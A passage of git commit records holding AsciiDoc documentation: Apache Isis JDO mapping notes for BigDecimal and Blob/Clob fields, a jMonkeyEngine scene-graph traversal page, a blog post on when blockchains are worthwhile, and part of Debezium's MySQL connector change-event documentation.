@Setter\nprivate LocalDate dueBy;\n----\n\n[[__ugfun_how-tos_class-structure_properties_mapping-bigdecimals]]\n== Mapping ``BigDecimal``s (Precision)\n\nWorking with `java.math.BigDecimal` properties takes a little care due to scale\/precision issues.\n\nFor example, suppose we have:\n\n[source,java]\n----\n@lombok.Getter @lombok.Setter\nprivate BigDecimal impact;\n----\n\nJDO\/DataNucleus creates, at least with HSQL, the table with the field type as NUMERIC(19). No decimal digits are admitted. (Further details http:\/\/hsqldb.org\/doc\/2.0\/guide\/sqlgeneral-chapt.html#sgc_numeric_types[here]).\n\nWhat this implies is that, when a record is inserted, a log entry similar to this one appears:\n\n[source,java]\n----\nINSERT INTO ENTITY(..., IMPACT, ....) VALUES (...., 0.5, ....)\n----\n\nBut when that same record is retrieved, the log will show that a value of \"0\" is returned, instead of 0.5.\n\nThe solution is to explicitly add the scale to the field like this:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(scale=2)\n@lombok.Getter @lombok.Setter\nprivate BigDecimal impact;\n----\n\nIn addition, you should also set the scale of the `BigDecimal`, using `setScale(scale, roundingMode)`.\n\nMore information can be found http:\/\/www.opentaps.org\/docs\/index.php\/How_to_Use_Java_BigDecimal:_A_Tutorial[here] and http:\/\/www.tutorialspoint.com\/java\/math\/bigdecimal_setscale_rm_roundingmode.htm[here].\n\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs]]\n== Mapping ``Blob``s and ``Clob``s\n\nApache Isis configures JDO\/DataNucleus so that the properties of type `org.apache.isis.applib.value.Blob` and `org.apache.isis.applib.value.Clob` can also be persisted.\n\nAs for xref:ugfun.adoc#__ugfun_how-tos_class-structure_properties_mapping-joda-dates[Joda dates], this requires the `@javax.jdo.annotations.Persistent` annotation.\nHowever, whereas for dates one would always expect this value to be retrieved eagerly, for blobs and clobs it is not so clear cut.\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs_mapping-blobs]]\n=== Mapping ``Blob``s\n\nFor example, in the `ToDoItem` class (of the https:\/\/github.com\/isisaddons\/isis-app-todoapp\/blob\/0333852ddd18ad67e3356fccf805aa442246790d\/dom\/src\/main\/java\/todoapp\/dom\/todoitem\/ToDoItem.java#L442[todoapp example app] (non-ASF) the `attachment` property is as follows:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"false\", columns = {\n @javax.jdo.annotations.Column(name = \"attachment_name\"),\n @javax.jdo.annotations.Column(name = \"attachment_mimetype\"),\n @javax.jdo.annotations.Column(name = \"attachment_bytes\", jdbcType=\"BLOB\", sqlType = \"LONGVARBINARY\")\n})\n@Property(\n optionality = Optionality.OPTIONAL\n)\n@lombok.Getter @lombok.Setter\nprivate Blob attachment;\n----\n\nThe three `@javax.jdo.annotations.Column` annotations are required because the mapping classes that Apache Isis provides (https:\/\/github.com\/apache\/isis\/blob\/isis-1.4.0\/component\/objectstore\/jdo\/jdo-datanucleus\/src\/main\/java\/org\/apache\/isis\/objectstore\/jdo\/datanucleus\/valuetypes\/IsisBlobMapping.java#L59[IsisBlobMapping] and https:\/\/github.com\/apache\/isis\/blob\/isis-1.4.0\/component\/objectstore\/jdo\/jdo-datanucleus\/src\/main\/java\/org\/apache\/isis\/objectstore\/jdo\/datanucleus\/valuetypes\/IsisClobMapping.java#L59[IsisClobMapping]) map to 3 columns.\n(It is not an error to omit these `@Column` annotations, but without them the names of the table columns are simply suffixed `_0`, `_1`, `_2` etc.\n\nIf the `Blob` is mandatory, then use:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"false\", columns = {\n @javax.jdo.annotations.Column(name = \"attachment_name\", allowsNull=\"false\"),\n @javax.jdo.annotations.Column(name = \"attachment_mimetype\", allowsNull=\"false\"),\n @javax.jdo.annotations.Column(name = \"attachment_bytes\",\n jdbcType=\"BLOB\", sqlType = \"LONGVARBINARY\",\n allowsNull=\"false\")\n})\n@Property(\n optionality = Optionality.MANDATORY\n)\n@lombok.Getter @lombok.Setter\nprivate Blob attachment;\n----\n\n[NOTE]\n====\nIf specifying a `sqlType` of \"LONGVARBINARY\" does not work, try instead \"BLOB\".\nThere can be differences in behaviour between JDBC drivers.\n====\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs_mapping-clobs]]\n=== Mapping ``Clob``s\n\nMapping `Clob`s works in a very similar way, but the `jdbcType` and `sqlType` attributes will, respectively, be `CLOB` and `LONGVARCHAR`:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"false\", columns = {\n @javax.jdo.annotations.Column(name = \"attachment_name\"),\n @javax.jdo.annotations.Column(name = \"attachment_mimetype\"),\n @javax.jdo.annotations.Column(name = \"attachment_chars\",\n jdbcType=\"CLOB\", sqlType = \"LONGVARCHAR\")\n})\nprivate Clob doc;\n@Property(\n optionality = Optionality.OPTIONAL\n)\npublic Clob getDoc() {\n return doc;\n}\npublic void setDoc(final Clob doc) {\n this.doc = doc;\n}\n----\n\n[NOTE]\n====\nIf specifying a `sqlType` of \"LONGVARCHAR\" does not work, try instead \"CLOB\". There can be differences in behaviour between JDBC drivers.\n====\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs_mapping-to-varbinary-or-varchar]]\n=== Mapping to VARBINARY or VARCHAR\n\nInstead of mapping to a sqlType of `LONGVARBINARY` (or perhaps `BLOB`), you might instead decide to map to a `VARBINARY`.\nThe difference is whether the binary data is held \"on-row\" or as a pointer \"off-row\"; with a `VARBINARY` the data is held on-row and so you will need to specify a length.\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(name = \"attachment_bytes\", jdbcTypr=\"BLOB\", sqlType = \"VARBINARY\", length=2048)\n----\n\nThe same argument applies to `LONGVARCHAR` (or `CLOB`); you could instead map to a regular `VARCHAR`:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(name = \"attachment_chars\", sqlType = \"VARCHAR\", length=2048)\n----\nSupport and maximum allowed length will vary by database vendor.\n\n\n\n[[__ugfun_how-tos_class-structure_properties_handling-mandatory-properties-in-subtypes]]\n== Handling Mandatory Properties in Subtypes\n\nIf you have a hierarchy of classes then you need to decide which inheritance strategy to use.\n\n* \"table per hierarchy\", or \"rollup\" (`InheritanceStrategy.SUPERCLASS_TABLE`) +\n+\nwhereby a single table corresponds to the superclass, and also holds the properties of the subtype (or subtypes) being rolled up\n\n* \"table per class\" (`InheritanceStrategy.NEW_TABLE`) +\n+\nwhereby is a table for both superclass and subclass, in 1:1 correspondence\n\n* \"rolldown\" (`InheritanceStrategy.SUBCLASS_TABLE`) +\n+\nwhereby a single table holds the properties of the subtype, and also holds the properties of its supertype\n\nIn the first \"rollup\" case, we can have a situation where - logically speaking - the property is mandatory in the subtype - but it must be mapped as nullable in the database because it is n\/a for any other subtypes that are rolled up.\n\nIn this situation we must tell JDO that the column is optional, but to Apache Isis we want to enforce it being mandatory. This can be done using the `@Property(optionality=Optionality.MANDATORY)` annotation.\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.Inheritance(strategy = InheritanceStrategy.SUPER_TABLE)\npublic class SomeSubtype extends SomeSuperType {\n @javax.jdo.annotations.Column(allowsNull=\"true\")\n @Property(optionality=Optionality.MANDATORY)\n @lombok.Getter @lombok.Setter\n private LocalDate date;\n}\n----\n\n[TIP]\n====\nThe `@Property(optionality=...)` annotation is equivalent to the older but still supported `@Optional` annotation and `@Mandatory` annotations.\n====\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"732996fc5636f1deb2c221208be979047c350653","subject":"Update traverse_scenegraph.adoc","message":"Update traverse_scenegraph.adoc\n\nFixed broken new lines.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/traverse_scenegraph.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/traverse_scenegraph.adoc","new_contents":"= Traverse the SceneGraph\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: spatial, node, mesh, geometry, scenegraph\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nYou can run a search across the whole scene graph and search for individual Spatials (`Nodes` and `Geometry`s) by custom criteria, such as the Spatial's name, or the Spatial's class, or the Spatial's user data, or Spatial's Controls. You do this when you want modify the found nodes (move them, call a method, etc) but you don't have a local variable for them.\n\n\n== Example Use Cases\n\n*Example 1:*\n\n. You have created a procedural scene with lots of dynamically generated elements.\n. You want to find individual Spatials under ever-changing conditions and modify their state. \n\n*Example 2:*\n\n. You created a mostly static scene in the jMonkeyEngine SDK and exported it as .j3o file. +\nThe scene also contains interactive objects, for example a particle emitter, spatials with user data, or spatials with custom controls. \n. You load the .j3o scene using the assetManager. \n. You want to interact with one of the loaded interactive scene elements in your Java code. +\nFor example, you want to call `emitAllParticles()` on the particle emitter. Or you want to find all NPC's Geometries with a custom CivilianControl, and call the CivilianControl method that makes them start acting their role.\n\nIn this case, you can use a SceneGraphVisitorAdapter to identify and access the Spatials in question.\n\n\n== Code Sample\n\nFor each search, you create a `com.jme3.scene.SceneGraphVisitorAdapter` that defines your search criteria and what you want to do with the found Spatials. Then you call the `depthFirstTraversal(visitor)` or `breadthFirstTraversal(visitor)` method of the Spatial (e.g. the rootNode, or better, a subnode) to start the search.\n\n[source,java]\n----\n\nSceneGraphVisitor visitor = new SceneGraphVisitor() {\n\n @Override\n public void visit(Spatial spat) {\n \/\/ search criterion can be control class:\n MyControl control = spatial.getControl(MyControl.class);\n if (control != null) {\n \/\/ you have access to any method, e.g. name.\n System.out.println(\"Instance of \" + control.getClass().getName() \n + \" found for \" + spatial.getName());\n }\n }\n\n};\n \n\/\/ Now scan the tree either depth first...\nrootNode.depthFirstTraversal(visitor);\n\/\/ ... or scan it breadth first.\nrootNode.breadthFirstTraversal(visitor);\n\n----\n\nWhich of the two methods is faster depends on how you designed the scengraph, and what tree element you are looking for. If you are searching for one single Geometry that is a \u201cleaf of the tree, and then stop searching, depth-first may be faster. If you search for a high-level grouping Node, breadth-first may be faster. \n\nThe choice of depth- vs breadth-first also influences the order in which found elements are returned (children first or parents first). If you want to modify user data that is inherited from the parent node (e.g. transformations), the order of application is important, because the side-effects add up.\n\nYou can use the SceneGraphVisitorAdapter class to scan separately for Geometry and Nodes.\n\n\n== See Also\n\n* <<jme3\/the_scene_graph#,The Scene Graph>>\n* <<jme3\/advanced\/spatial#,Spatial>>\n","old_contents":"= Traverse the SceneGraph\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: spatial, node, mesh, geometry, scenegraph\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nYou can run a search across the whole scene graph and search for individual Spatials (`Nodes` and `Geometry`s) by custom criteria, such as the Spatial's name, or the Spatial's class, or the Spatial's user data, or Spatial's Controls. You do this when you want modify the found nodes (move them, call a method, etc) but you don't have a local variable for them.\n\n\n== Example Use Cases\n\n*Example 1:*\n\n. You have created a procedural scene with lots of dynamically generated elements.\n. You want to find individual Spatials under ever-changing conditions and modify their state. \n\n*Example 2:*\n\n. You created a mostly static scene in the jMonkeyEngine SDK and exported it as .j3o file. +The scene also contains interactive objects, for example a particle emitter, spatials with user data, or spatials with custom controls. \n. You load the .j3o scene using the assetManager. \n. You want to interact with one of the loaded interactive scene elements in your Java code. +For example, you want to call `emitAllParticles()` on the particle emitter. Or you want to find all NPC's Geometries with a custom CivilianControl, and call the CivilianControl method that makes them start acting their role.\n\nIn this case, you can use a SceneGraphVisitorAdapter to identify and access the Spatials in question.\n\n\n== Code Sample\n\nFor each search, you create a `com.jme3.scene.SceneGraphVisitorAdapter` that defines your search criteria and what you want to do with the found Spatials. Then you call the `depthFirstTraversal(visitor)` or `breadthFirstTraversal(visitor)` method of the Spatial (e.g. the rootNode, or better, a subnode) to start the search.\n\n[source,java]\n----\n\nSceneGraphVisitor visitor = new SceneGraphVisitor() {\n\n @Override\n public void visit(Spatial spat) {\n \/\/ search criterion can be control class:\n MyControl control = spatial.getControl(MyControl.class);\n if (control != null) {\n \/\/ you have access to any method, e.g. name.\n System.out.println(\"Instance of \" + control.getClass().getName() \n + \" found for \" + spatial.getName());\n }\n }\n\n};\n \n\/\/ Now scan the tree either depth first...\nrootNode.depthFirstTraversal(visitor);\n\/\/ ... or scan it breadth first.\nrootNode.breadthFirstTraversal(visitor);\n\n----\n\nWhich of the two methods is faster depends on how you designed the scengraph, and what tree element you are looking for. If you are searching for one single Geometry that is a \u201cleaf of the tree, and then stop searching, depth-first may be faster. If you search for a high-level grouping Node, breadth-first may be faster. \n\nThe choice of depth- vs breadth-first also influences the order in which found elements are returned (children first or parents first). If you want to modify user data that is inherited from the parent node (e.g. transformations), the order of application is important, because the side-effects add up.\n\nYou can use the SceneGraphVisitorAdapter class to scan separately for Geometry and Nodes.\n\n\n== See Also\n\n* <<jme3\/the_scene_graph#,The Scene Graph>>\n* <<jme3\/advanced\/spatial#,Spatial>>\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"be1394c0c95db6cae0f394f3d7a970d87449bff0","subject":"Update 2018-04-16-When-is-using-a-Blockchain-compelling.adoc","message":"Update 2018-04-16-When-is-using-a-Blockchain-compelling.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-16-When-is-using-a-Blockchain-compelling.adoc","new_file":"_posts\/2018-04-16-When-is-using-a-Blockchain-compelling.adoc","new_contents":"= When is using a Blockchain compelling\nPeter Lawrey\n:published_at: 2018-04-16\n:hp-tags: Block Chain, Use Case\n\nI was recently asked, when is using a Blockchain really needed?\n\nIMHO the main benefit is **ease of provider integration** Blockchain allows providers to join a system, with a much lower barrier to entry. If you are looking to build a network of new and innovative providers, which don't have to trust each other, instead they trust the protocol, a blockchain is a compelling solution.\n\n=== When is Blockchain not a compelling reason?\n\nFirst I feel I should debunk some reasons often stated.\n\n==== Blockchain doesn't make everything better\n\nIn many cases, when a blockchain is proposed, it is used as little more than a log of changes in a database. In some cases, a distributed ledger could be used when a centralised database isn't enough. Blockchain projects are easier to get approved these days as companies and individuals want to improve their blockchain skill sets but this doesn't make it compelling from a technical point of view IMHO.\n\n==== Blockchain is unlikely to make things faster\n\nIn most cases you will still need a database for reporting services, so adding a blockchain is highly likely to make it more complicated and slower, not simpler and faster than a database alone. https:\/\/www2.deloitte.com\/nl\/nl\/pages\/financial-services\/articles\/5-blockchain-use-cases-in-financial-services.html[See this article which mention speeding up payments] \n\nBlockchain can make a system faster if it can replace enough of an existing system which already implements the features a blockchain offers, but in a less efficient manner.\n\n==== Blockchain doesn't address all security concerns\n\nTo compromise a cluster of nodes you can employ a https:\/\/learncryptography.com\/cryptocurrency\/51-attack[51% attack]. If you control a majority of nodes, you control the whole system. This could happen by adding or hacking enough nodes. A state level organisation could do this, potentially even with the most popular crypto currencies, however most governments have easier\/cheaper ways of exercising policy or influence.\n\nMany cryptocurrencies are public which is a real privacy concern when some of the bank balances are very high (or at least high to the individuals holding them).\n\nAt the time of writing https:\/\/bitinfocharts.com\/bitcoin\/address\/3D2oetdNuZUqQHPJmcMDDHYoqkyNVsFk9r[This bitcoin address] has $1.5 bn, and this https:\/\/etherscan.io\/address\/0x281055afc982d96fab65b3a49cac8b878184cb16[ethereum address] has around $770 m which makes them targets for hackers and organised crime. \n\nMaking this information private is likely to be highly desirable. However it could still be obtained through a hack though that is harder.\n\n=== When is Blockchain compelling?\n\nWhen participants trust a protocol, they don't have to trust each other as much. This makes inclusion of new participants easier and allow existing ones to be more innovative.\n\n==== Security\n\nReduced security impacts via a https:\/\/www.forbes.com\/sites\/bernardmarr\/2017\/08\/10\/practical-examples-of-how-blockchains-are-used-in-banking-and-the-financial-services-sector\/[immutable ledger] This means a new provider can join without all the existing providers needing to be fully comfortable with their security setup. \n\nNOTE: A high percentage of hacks involve disgruntled former employees. If you trust every node from every provider you have to trust every person operating it.\n\n==== Innovative solutions\n\nUsing sub-chains, different providers can offer innovative solutions, without everyone else in the system needing to be comfortable with those solutions. By the time every participant is comfortable with a new solution, it's probably not that innovative\/disruptive. If every node needs to be trusted, you can't offer a solution\/transaction type unless every provider is comfortable with the risk associated with it.\n\n==== Built in fee support\n\nAs the system controls the flow of value, it can also include settlement of fees and cut off participants as a result of exceeding some limit. e.g. if a participant, for whatever reason, starts spamming the system, this will cost them and result in them being cut off.\n\n=== Does a blockchain need to have its own currency?\n\nA blockchain offers a virtualisation of currencies. These can be backed by fiat or another digital currencies, or a new currency or both. If the system has fees to cover the cost of running the service, it needs to be in a supported currency. This could be in USD or EUR rather a new currency, however a crypto currency has the advantage that the actual cost can have a floating exchanging rate with fiat currencies. e.g. each transaction could cost 1 TXN and the value of this can be determined by an exchange.\n\nNew currencies can have novel features such as only being usable after a future date. You could have a 1000 USD token which is only usable after 1st Jan 2020, but can be bought now at a discount.\n\n=== Conclusion\n\nWhile I feel than many blockchain solutions could have used a database instead, there are some compelling use cases which allow multiple providers to offer innovating solutions to customers.\n\n","old_contents":"= When is using a Blockchain compelling\nPeter Lawrey\n:published_at: 2018-04-16\n:hp-tags: Block Chain, Use Case\n\nI was recently asked; when is using a Blockchain really needed?\n\nIMHO the main benefit is **ease of provider integration** Blockchain allows providers to join a system, with a much lower barrier to entry. If you are looking to build a network of new and innovative providers, which don't have to trust each other, instead they trust the protocol, a blockchain is a compelling solution.\n\n=== When is Blockchain not a compelling reason?\n\nFirst I feel I should debunk some reasons often stated\n\n==== Blockchain doesn't make everything better\n\nIn many cases when a blockchain is proposed, it is used as little more than a log of changes in a database. In some cases, a distributed ledger could be used when a centralised database isn't enough. Blockchain projects are easier to get approved these days as companies and individuals want to improve their blockchain skill sets but this doesn't make it compelling from a technical point of view IMHO.\n\n==== Blockchain is unlikely to make things faster\n\nIn most cases you will still need a database for reporting services, so adding a blockchain is highly likely to make it more complicated and slower, not simpler and faster than a database alone. https:\/\/www2.deloitte.com\/nl\/nl\/pages\/financial-services\/articles\/5-blockchain-use-cases-in-financial-services.html[To speed up a process] \n\nBlockchain can make a system faster if it can replace enough of an existing system which already implements the features a blockchain offers but in a less efficient manner.\n\n==== Blockchain doesn't address all security concerns\n\nTo compromise a cluster of nodes you can employ a https:\/\/learncryptography.com\/cryptocurrency\/51-attack[51% attack]. If you control a majority of nodes, you control the whole system. This could happen by adding or hacking enough nodes. A state level organisation could do this, potentially even with the most popular crypto currencies, however most govenments have easier\/cheaper ways of exercising policy or influence.\n\nMany cryptocurrencies are public which is a real privacy concern when some of the bank balances are very high (or at least high to the individuals holding them) \n\nAt the time of writing https:\/\/bitinfocharts.com\/bitcoin\/address\/3D2oetdNuZUqQHPJmcMDDHYoqkyNVsFk9r[This bitcoin address] has $1.5 bn, and this https:\/\/etherscan.io\/address\/0x281055afc982d96fab65b3a49cac8b878184cb16[ethereum address] has around $770 m which makes them targets for hackers and organised crime. \n\nMaking this information private is likely to be highly desirable. However it could still be obtained through a hack though that is harder.\n\n=== When is Blockchain compelling?\n\nWhen participants trust a protocol, they don't have to trust each other as much. This makes inclusion of new participants easier and allow existing ones to be more innovative.\n\n==== Security\n\nReduced security impacts via a https:\/\/www.forbes.com\/sites\/bernardmarr\/2017\/08\/10\/practical-examples-of-how-blockchains-are-used-in-banking-and-the-financial-services-sector\/[immutable ledger] This means a new provider can joins without all the existing providers needing to be fully comfortable with their security setup. \n\nNOTE: A high percentage of hacks involve disgruntled former employees. If you trust every node from every provider you have to trust every person operating it.\n\n==== Innovative solutions\n\nUsing sub-chains, different providers can offer innovative solutions, without every one else in the system needing to be comfortable with those solutions. By the time every participant is comfortable with a new solution, it probably not that innovative\/disruptive. If every node needs to be trusted, you can't offer a solution\/transaction type unless every provider is comfortable with the risk associated with it.\n\n==== Built in fee support\n\nAs the system controls the flow of value, it can also include settlement of fees and cut off participants as a result of exceeding some limit. e.g. if a participant, for what ever reason, starts spamming the system, this will cost them and result in them being cut off.\n\n=== Does a blockchain need to have it's own currency?\n\nA blockchain offers a virtualisation of currencies. These can be backed by fiat or another digital currencies, or a new currency or both. If the system has fees to cover the cost of running the service, it needs to be in a supported currency. This could be in USD or EUR rather a new currency, however a crypto currency has the advantage that the actual cost can have a floating exchanging rate with fiat currencies. e.g. each transaction could cost 1 TXN and the value of this can be determined by an exchange.\n\nNew currencies can have novel features such as only being usable after a future date. You could have a 1000 USD token which is only usable after 1st Jan 2020, but can be bought now at a discount.\n\n=== Conclusion\n\nWhile I feel than many blockchain soltuions could have used a database instead, there are some compelling use cases which allow multiple providers to offer innovating solutions to customers.\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"db44d48aa5995da770f4cee3130e0809da7ab8ba","subject":"DBZ-2226 Updates based on comments from Chris","message":"DBZ-2226 Updates based on comments from Chris\n","repos":"debezium\/debezium,jpechane\/debezium,debezium\/debezium,jpechane\/debezium,debezium\/debezium,jpechane\/debezium,jpechane\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/partials\/modules\/mysql-connector\/con-mysql-connector-events.adoc","new_file":"documentation\/modules\/ROOT\/partials\/modules\/mysql-connector\/con-mysql-connector-events.adoc","new_contents":"\/\/ Metadata created by nebel\n\/\/\n[id=\"mysql-connector-events_{context}\"]\n= MySQL connector events\n\nThe {prodname} MySQL connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed. \n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained. \n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converver and you configure it to produce all four basic change event parts, change events have this structure: \n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/<1>\n ...\n },\n \"payload\": { \/\/<2>\n ...\n },\n \"schema\": { \/\/<3> \n ...\n },\n \"payload\": { \/\/<4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-mysql-connector}#mysql-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed. \n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas. \n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-mysql-connector}#the-mysql-connector-and-kafka-topics_{context}[MySQL connector and Kafka topics].\n\n[WARNING]\n====\nThe MySQL connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\n== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table. \n\n.Example table\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,index=0]\n----\n{\n \"schema\": { <1>\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Key\", <2>\n \"optional\": false, <3>\n \"fields\": [ <4>\n {\n \"field\": \"id\",\n \"type\": \"int32\",\n \"optional\": false\n }\n ]\n },\n \"payload\": { <5>\n \"id\": 1001\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion. \n\n|2\n|`mysql-server-1.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: + \n\n* `mysql-server-1` is the name of the connector that generated this event. + \n* `inventory` is the database that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields` \n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `id` field whose value is `1001`.\n\n|===\n\n== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure. \n\nConsider the same sample table that was used to show an example of a change event key: \n\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nThe value portion of a change event for a change to this table is described for each event type: \n\n* <<mysql-create-events,_create_ events>>\n* <<mysql-update-events,_update_ events>>\n* <<mysql-delete-events,_delete_ events>>\n\n[id=\"mysql-create-events\"]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \/\/ <2>\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.product.connector.mysql.Source\", \/\/ <2>\n \"field\": \"source\"\n },\n {\n \"type\": 